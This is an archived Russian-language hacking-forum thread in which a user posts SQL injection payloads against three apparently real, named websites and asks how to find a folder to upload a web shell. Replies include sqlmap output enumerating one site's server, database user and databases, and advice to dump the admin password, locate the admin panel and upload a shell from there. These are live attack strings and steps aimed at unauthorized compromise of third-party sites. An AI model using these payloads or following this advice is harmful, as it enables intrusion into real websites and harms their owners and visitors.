Просмотр полной версии : Помогите залить Shell (Mysql Injection)
woodlandcenters.com/news.php?id=-3529 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171626a71,0x79634249 4373766a436e43444850717857576b696a64565a5074476165 714b644c63614a6a4b7675,0x716a707a71)-- NzCQ
arvsolutions.co.uk/news.php?id=39 (https://www.arvsolutions.co.uk/news.php?id=39)' AND 3547=3547 AND 'OEvV'='OEvV
justindellojoio.com/news.php?id=12 (http://www.justindellojoio.com/news.php?id=12) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b7071,0x6f76755243634 e55624c6143584167734f435768575273425876636a6d63766 35874497069734c53,0x716a767671),NULL,NULL,NULL-- reTC
Как узнать папку в которую можно залить shell ?
lifescore
03.04.2018, 00:23
Господи помилуй этого человека..
[23:20:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[23:20:32] [INFO] fetching current user
current user: 'justin@localhost'
[23:20:33] [INFO] fetching current database
current database: 'justin'
[23:20:33] [INFO] testing if current user is DBA
[23:20:33] [INFO] fetching current user
[23:20:33] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[23:20:33] [INFO] fetching database names
available databases [2]:
information_schema
justin
https://www.aldeid.com/wiki/From-common-sql-injection-to-system-compromise
BabaDook
03.04.2018, 00:31
Миxей said:
↑ (https://antichat.live/posts/4198633/)
woodlandcenters.com/news.php?
id=-3529 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171626a71,0x79634249 4373766a436e43444850717857576b696a64565a5074476165 714b644c63614a6a4b7675,0x716a707a71)-- NzCQ
arvsolutions.co.uk/news.php?id=39 (https://www.arvsolutions.co.uk/news.php?id=39)
' AND 3547=3547 AND 'OEvV'='OEvV
justindellojoio.com/news.php?id=12 (http://www.justindellojoio.com/news.php?id=12)
UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b7071,0x6f76755243634 e55624c6143584167734f435768575273425876636a6d63766 35874497069734c53,0x716a767671),NULL,NULL,NULL-- reTC
Как узнать папку в которую можно залить shell ?
Через уязвимость никак, сливайте пароль, ищите админку и пробуйте заливать шелл
lifescore
03.04.2018, 01:00
Миxей said:
↑ (https://antichat.live/posts/4198633/)
woodlandcenters.com/news.php?
id=-3529 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171626a71,0x79634249 4373766a436e43444850717857576b696a64565a5074476165 714b644c63614a6a4b7675,0x716a707a71)-- NzCQ
arvsolutions.co.uk/news.php?id=39 (https://www.arvsolutions.co.uk/news.php?id=39)
' AND 3547=3547 AND 'OEvV'='OEvV
justindellojoio.com/news.php?id=12 (http://www.justindellojoio.com/news.php?id=12)
UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b7071,0x6f76755243634 e55624c6143584167734f435768575273425876636a6d63766 35874497069734c53,0x716a767671),NULL,NULL,NULL-- reTC
Как узнать папку в которую можно залить shell ?
Найди пол часа свободного времени для ознакомления
https://www.tenable.com/blog/configuration-auditing-phpini-to-help-prevent-web-application-attacks
Да бы знать что одних привелегий на запись файлов еще не досаточно. И вопрос по папкам там тоже присутствует.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot